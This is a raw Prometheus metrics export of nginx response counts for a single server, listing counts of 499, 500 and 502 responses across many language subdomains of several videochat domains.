nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.tv.br"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.world"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.world"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.tv.br"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.world"} 338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.cafe"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.tv.br"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.world"} 231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.date"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.tv.br"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.world"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.tv.br"} 390 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.world"} 256 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pdxecxblqbkn.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pkiaram.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.date"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.world"} 412 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.cafe"} 118 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.date"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.world"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="qshicka.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="rbohjhr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.tv.br"} 255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.world"} 272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ryfusmrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.cafe"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.world"} 247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="semjnsl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.date"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.tv.br"} 151 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.cafe"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.tv.br"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.world"} 293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.cafe"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.tv.br"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.world"} 224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sptlqmk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.cafe"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.date"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.tv.br"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.world"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="staging.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.tv.br"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.world"} 257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.cafe"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.world"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.tv.br"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.world"} 211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.tv.br"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.tv.br"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="test.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.cafe"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.date"} 106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.tv.br"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.world"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.tv.br"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.world"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.world"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.world"} 414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.date"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.tv.br"} 361 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.world"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.tv.br"} 222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.cafe"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.date"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.tv.br"} 88 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.date"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.tv.br"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="usavbchm.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.date"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.tv.br"} 342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.world"} 235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.cafe"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.date"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.tv.br"} 139 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.world"} 265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.cafe"} 1793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.date"} 951 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.mx"} 3011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.show"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.tv.br"} 2940 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.world"} 2677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vmi460104.contaboserver.net"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="waqqvxh.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="whuinar.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="wngqune.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.tv.br"} 723 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.world"} 223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xicipcrvyobs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ybifrit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yfutyaz.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.date"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.tv.br"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zdchomr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zdkfdnl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.world"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="af.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="az.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="bn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="bs.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ceb.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="chm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="cy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="de.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="el.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="en.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="fi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="hi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="hr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ht.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="it.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="kk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="km.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pap.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="sk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="sv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="tt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="uz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="www.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="xh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="zh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="am.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="am.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ar.videochat.tv.br"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ar.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.world"} 8 